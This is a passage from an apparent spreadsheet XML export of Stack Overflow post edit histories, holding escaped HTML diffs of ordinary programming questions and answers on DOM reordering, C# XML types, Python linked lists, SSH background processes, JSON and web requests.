    &amp;lt;li id="list-item3"&amp;gt;text 3&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item4"&amp;gt;text 4&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item2"&amp;gt;text 2&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item1"&amp;gt;text 1&amp;lt;/li&amp;gt;_x000D_
&amp;lt;/ul&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I have a list like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;ul id="mylist"&amp;gt;_x000D_
    &amp;lt;li id="list-item1"&amp;gt;text 1&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item2"&amp;gt;text 2&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item3"&amp;gt;text 3&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item4"&amp;gt;text 4&amp;lt;/li&amp;gt;_x000D_
&amp;lt;/ul&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What's the easiest way to re-arrange the DOM nodes to my preference? (This needs to happen automatically when the page loads, the list-order preference is gained from a cookie)&lt;/p&gt; _x000D_
 &lt;p&gt; E.g.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;ul id="mylist"&amp;gt;_x000D_
    &amp;lt;li id="list-item3"&amp;gt;text 3&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item4"&amp;gt;text 4&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item2"&amp;gt;text 2&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item1"&amp;gt;text 1&amp;lt;/li&amp;gt;_x000D_
&amp;lt;/ul&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;How can I&lt;/span&gt; convert an XElement to an XmlNode in C#&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; LinqToXML makes it nice to build the required XML programmatically but SharePoint web services requires an XmlNode&lt;span class="diff-delete"&gt;. What's&lt;/span&gt; the best way&lt;span class="diff-delete"&gt; to covert from one XML data type&lt;/span&gt; to &lt;span class="diff-delete"&gt;the other&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;HI,&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Is there any 'correct' way to&lt;/span&gt; convert an XElement to an XmlNode in C#&lt;span class="diff-add"&gt; -&lt;/span&gt; LinqToXML makes it nice to build the required XML programmatically but SharePoint web services requires an XmlNode&lt;span class="diff-add"&gt;, so whats&lt;/span&gt; the best way to &lt;span class="diff-add"&gt;mix and match&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Moo</t>
  </si>
  <si>
    <t>p.campbell</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here is some list functions based on &lt;a href="http://stackoverflow.com/questions/280243/python-linked-list#280284"&gt;Martin v. LÃ¶wis's representation&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;cons   = lambda el, lst: (el, lst)_x000D_
mklist = lambda *args: reduce(lambda lst, el: cons(el, lst), reversed(args), None)_x000D_
car = lambda lst: lst[0] if lst else lst_x000D_
cdr = lambda lst: lst[1] if lst else lst_x000D_
nth = lambda n, lst: nth(n-1, cdr(lst)) if n &amp;gt; 0 else car(lst)_x000D_
length  = lambda lst, count=0: length(cdr(lst), count+1) if lst else count_x000D_
begin   = lambda *args: args[-1]_x000D_
display = lambda lst: begin(w("%s " % car(lst)), display(cdr(lst))) if lst else w("nil\n")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; where &lt;code&gt;w = sys.stdout.write&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Thomas Watnedal &lt;a href="http://stackoverflow.com/questions/280243/python-linked-list#280280"&gt;suggested&lt;/a&gt; a good educational resource &lt;a href="http://greenteapress.com/thinkpython/html/chap17.html" rel="nofollow noreferrer"&gt;How to Think Like a Computer Scientist, Chapter 17: Linked lists&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt; A linked list is either:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt; the empty list, represented by None, or&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; a node that contains a cargo object and a reference to a linked list.&lt;/p&gt; &lt;pre&gt;&lt;code&gt; class Node: _x000D_
   def __init__(self, cargo=None, next=None): _x000D_
     self.car = cargo _x000D_
     self.cdr = next    _x000D_
   def __str__(self): _x000D_
     return str(self.car)_x000D_
_x000D_
 def display(lst):_x000D_
   if lst:_x000D_
     w("%s " % lst)_x000D_
     display(lst.cdr)_x000D_
   else:_x000D_
     w("nil\n")_x000D_
&lt;/code&gt;&lt;/pre&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here is some list functions based on &lt;a href="http://stackoverflow.com/questions/280243/python-linked-list#280284"&gt;Martin v. LÃ¶wis's representation&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;cons   = lambda el, lst: (el, lst)_x000D_
mklist = lambda *args: reduce(lambda lst, el: cons(el, lst), reversed(args), None)_x000D_
car = lambda lst: lst[0] if lst else lst_x000D_
cdr = lambda lst: lst[1] if lst else lst_x000D_
nth = lambda n, lst: nth(n-1, cdr(lst)) if n &amp;gt; 0 else car(lst)_x000D_
length  = lambda lst, count=0: length(cdr(lst), count+1) if lst else count_x000D_
begin   = lambda *args: args[-1]_x000D_
display = lambda lst: begin(w("%s " % car(lst)), display(cdr(lst))) if lst else w("nil\n")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; where &lt;code&gt;w = sys.stdout.write&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Linked lists have no practical value in Python. I've &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;never&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; used a linked list in Python for any problem except educational.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Thomas Watnedal &lt;a href="http://stackoverflow.com/questions/280243/python-linked-list#280280"&gt;suggested&lt;/a&gt; a good educational resource &lt;a href="http://greenteapress.com/thinkpython/html/chap17.html" rel="nofollow noreferrer"&gt;How to Think Like a Computer Scientist, Chapter 17: Linked lists&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt; A linked list is either:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt; the empty list, represented by None, or&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; a node that contains a cargo object and a reference to a linked list.&lt;/p&gt; &lt;pre&gt;&lt;code&gt; class Node: _x000D_
   def __init__(self, cargo=None, next=None): _x000D_
     self.car = cargo _x000D_
     self.cdr = next    _x000D_
   def __str__(self): _x000D_
     return str(self.car)_x000D_
_x000D_
 def display(lst):_x000D_
   if lst:_x000D_
     w("%s " % lst)_x000D_
     display(lst.cdr)_x000D_
   else:_x000D_
     w("nil\n")_x000D_
&lt;/code&gt;&lt;/pre&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Aaron Hall</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; what's the best/proper way of interacting between several windows in C# app?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Recently&lt;/span&gt;, I've run into a problem where one of program windows has to call method modifying main window. My solution was to create factory-like class, that would arrange all underlying model-data and organize the communication between various windows (through delegates). However, as passing one or two delegates was not a problem, I started thinking what if my other windows would need 10 delegates to interact properly with main window?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; Are delegates good solution? How to pass them in good way - through constructor, properties? Or maybe the need of using that many delegates is some serious design flaw itself?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Duplicate of &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/50153/interprocess-communication-for-windows-in-c-net-20"&gt;&lt;span class="diff-delete"&gt;this question&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; what's the best/proper way of interacting between several windows in C# app?&lt;span class="diff-add"&gt; Recently&lt;/span&gt;, I've run into a problem where one of program windows has to call method modifying main window. My solution was to create factory-like class, that would arrange all underlying model-data and organize the communication between various windows (through delegates). However, as passing one or two delegates was not a problem, I started thinking what if my other windows would need 10 delegates to interact properly with main window? Are delegates good solution? How to pass them in good way - through constructor, properties? Or maybe the need of using that many delegates is some serious design flaw itself?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hey guys, I already know Java, Objective C, C#, and some Python. I want to be able to integrate with XML or a MySQL database for dynamic content.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;What's a good tutorial&lt;/span&gt; or online &lt;span class="diff-delete"&gt;reference&lt;/span&gt; that would get me up and running with Actionscript 3.0?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hey guys, I already know Java, Objective C, C#, and some Python. I want to be able to integrate with XML or a MySQL database for dynamic content.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;What are some tutorials&lt;/span&gt; or online &lt;span class="diff-add"&gt;references&lt;/span&gt; that would get me up and running with Actionscript 3.0?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>mclaughj</t>
  </si>
  <si>
    <t>Mark Brady</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on a linux machine through SSH (Putty).&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I&lt;/span&gt; need to leave a process running during the night, so I thought I could do that by starting the process in background (with an ampersand at the end of the command) and redirecting &lt;code&gt;&lt;span class="diff-delete"&gt;stdout&lt;/span&gt;&lt;/code&gt; to a file.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; To&lt;/span&gt; my surprise, that doesn't work. As soon as I close the Putty window, the process is stopped.&lt;/p&gt; _x000D_
 &lt;p&gt; How can I prevent that from happening?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on a linux machine through SSH (Putty).&lt;span class="diff-add"&gt; I&lt;/span&gt; need to leave a process running during the night, so I thought I could do that by starting the process in background (with an ampersand at the end of the command) and redirecting &lt;span class="diff-add"&gt;stdout&lt;/span&gt; to a file.&lt;span class="diff-add"&gt; To&lt;/span&gt; my surprise, that doesn't work. As soon as I close the Putty window, the process is stopped.&lt;/p&gt; _x000D_
 &lt;p&gt; How can I prevent that from happening&lt;span class="diff-add"&gt;?&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>GetFree</t>
  </si>
  <si>
    <t>Rakete1111</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You could do something like this (adjust the regex to suit your needs):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String originalString = "Please go to http://www.stackoverflow.com";_x000D_
String newString = originalString.replaceAll("http://.+?(com|net|org)/&lt;span class="diff-delete"&gt;?&lt;/span&gt;", "&amp;lt;a href=\"$0\"&amp;gt;$0&amp;lt;/a&amp;gt;");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You could do something like this (adjust the regex to suit your needs):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String originalString = "Please go to http://www.stackoverflow.com";_x000D_
String newString = originalString.replaceAll("http://.+?(com|net|org)/&lt;span class="diff-add"&gt;{0,1}&lt;/span&gt;", "&amp;lt;a href=\"$0\"&amp;gt;$0&amp;lt;/a&amp;gt;");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; From &lt;/span&gt;&lt;a href="http://www.json.org/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;JSON.org&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;JSON (JavaScript Object Notation) is a lightweight data-interchange format&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt;. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999. JSON is a text format that is completely language independent but uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python, and many others. These properties make JSON an ideal data-interchange language.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; An object is an unordered set of name/value pairs. An object begins with { (left brace) and ends with } (right brace). Each name is followed by : (colon) and the name/value pairs are separated by , (comma).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/object.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/object.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; An array is an ordered collection of values. An array begins with [ (left bracket) and ends with ] (right bracket). Values are separated by , (comma).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/array.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/array.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A value can be a string in double quotes, or a number, or true or false or null, or an object or an array. These structures can be nested.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/value.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/value.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A string is a collection of zero or more Unicode characters, wrapped in double quotes, using backslash escapes. A character is represented as a single character string. A string is very much like a C or Java string.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/string.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/string.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A number is very much like a C or Java number, except that the octal and hexadecimal formats are not used. &lt;a href="http://www.json.org/number.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/number.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Here is an example&lt;span class="diff-delete"&gt; (&lt;/span&gt;&lt;a href="http://www.json.org/example.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;more&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs json"&gt;&lt;code&gt;{&lt;span class="hljs-attr"&gt;"menu"&lt;/span&gt;: {_x000D_
  &lt;span class="hljs-attr"&gt;"id"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"file"&lt;/span&gt;,_x000D_
  &lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"File"&lt;/span&gt;,_x000D_
  &lt;span class="hljs-attr"&gt;"popup"&lt;/span&gt;: {_x000D_
    &lt;span class="hljs-attr"&gt;"menuitem"&lt;/span&gt;: [_x000D_
      {&lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"New"&lt;/span&gt;, &lt;span class="hljs-attr"&gt;"onclick"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"CreateNewDoc()"&lt;/span&gt;},_x000D_
      {&lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"Open"&lt;/span&gt;, &lt;span class="hljs-attr"&gt;"onclick"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"OpenDoc()"&lt;/span&gt;},_x000D_
      {&lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"Close"&lt;/span&gt;, &lt;span class="hljs-attr"&gt;"onclick"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"CloseDoc()"&lt;/span&gt;}_x000D_
    ]_x000D_
  }_x000D_
}}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And in XML the same thing would have been:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs xml"&gt;&lt;code&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menu&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"File"&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;popup&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menuitem&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"New"&lt;/span&gt; &lt;span class="hljs-attr"&gt;onclick&lt;/span&gt;=&lt;span class="hljs-string"&gt;"CreateNewDoc()"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menuitem&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Open"&lt;/span&gt; &lt;span class="hljs-attr"&gt;onclick&lt;/span&gt;=&lt;span class="hljs-string"&gt;"OpenDoc()"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menuitem&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Close"&lt;/span&gt; &lt;span class="hljs-attr"&gt;onclick&lt;/span&gt;=&lt;span class="hljs-string"&gt;"CloseDoc()"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;popup&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;menu&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Hope you now get an idea of what is JSON.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;JSON (JavaScript Object Notation) is a lightweight data-interchange format&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999. JSON is a text format that is completely language independent but uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python, and many others. These properties make JSON an ideal data-interchange language.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; An object is an unordered set of name/value pairs. An object begins with { (left brace) and ends with } (right brace). Each name is followed by : (colon) and the name/value pairs are separated by , (comma).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/object.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/object.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; An array is an ordered collection of values. An array begins with [ (left bracket) and ends with ] (right bracket). Values are separated by , (comma).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/array.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/array.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A value can be a string in double quotes, or a number, or true or false or null, or an object or an array. These structures can be nested.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/value.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/value.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A string is a collection of zero or more Unicode characters, wrapped in double quotes, using backslash escapes. A character is represented as a single character string. A string is very much like a C or Java string.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.json.org/string.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/string.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A number is very much like a C or Java number, except that the octal and hexadecimal formats are not used. &lt;a href="http://www.json.org/number.gif" rel="nofollow noreferrer"&gt;alt text http://www.json.org/number.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; You can get more information at &lt;/span&gt;&lt;a href="http://www.json.org/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;json.org&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Here is an example:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs json"&gt;&lt;code&gt;{&lt;span class="hljs-attr"&gt;"menu"&lt;/span&gt;: {_x000D_
  &lt;span class="hljs-attr"&gt;"id"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"file"&lt;/span&gt;,_x000D_
  &lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"File"&lt;/span&gt;,_x000D_
  &lt;span class="hljs-attr"&gt;"popup"&lt;/span&gt;: {_x000D_
    &lt;span class="hljs-attr"&gt;"menuitem"&lt;/span&gt;: [_x000D_
      {&lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"New"&lt;/span&gt;, &lt;span class="hljs-attr"&gt;"onclick"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"CreateNewDoc()"&lt;/span&gt;},_x000D_
      {&lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"Open"&lt;/span&gt;, &lt;span class="hljs-attr"&gt;"onclick"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"OpenDoc()"&lt;/span&gt;},_x000D_
      {&lt;span class="hljs-attr"&gt;"value"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"Close"&lt;/span&gt;, &lt;span class="hljs-attr"&gt;"onclick"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"CloseDoc()"&lt;/span&gt;}_x000D_
    ]_x000D_
  }_x000D_
}}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And in XML the same thing would have been:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs xml"&gt;&lt;code&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menu&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"File"&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;popup&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menuitem&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"New"&lt;/span&gt; &lt;span class="hljs-attr"&gt;onclick&lt;/span&gt;=&lt;span class="hljs-string"&gt;"CreateNewDoc()"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menuitem&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Open"&lt;/span&gt; &lt;span class="hljs-attr"&gt;onclick&lt;/span&gt;=&lt;span class="hljs-string"&gt;"OpenDoc()"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;menuitem&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Close"&lt;/span&gt; &lt;span class="hljs-attr"&gt;onclick&lt;/span&gt;=&lt;span class="hljs-string"&gt;"CloseDoc()"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;popup&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;menu&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Hope you now get an idea of what is JSON.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Should I start a Python program with:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;if __name__&lt;/span&gt; == '__main__':_x000D_
some code..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And if so, why? I saw it many times but don't have a clue about it.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Closed. Thx.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Should I start a Python program with:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;if__name__&lt;/span&gt; == '__main__':_x000D_
some code..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And if so, why? I saw it many times but don't have a clue about it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>S.Lott</t>
  </si>
  <si>
    <t>Kirill Titov</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've done something like this, building an xml request manually and then using the webrequest object to submit the request:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;string data = "the xml document to submit";_x000D_
string url = "the webservice url";_x000D_
string response = "the response from the server";_x000D_
_x000D_
// build request objects to pass the data/xml to the server_x000D_
byte[] buffer = Encoding.ASCII.GetBytes(data);_x000D_
HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;_x000D_
request.Method = "POST";_x000D_
request.ContentType = "application/x-www-form-urlencoded";_x000D_
request.ContentLength = buffer.Length;_x000D_
Stream post = request.GetRequestStream();_x000D_
_x000D_
// post data and close connection_x000D_
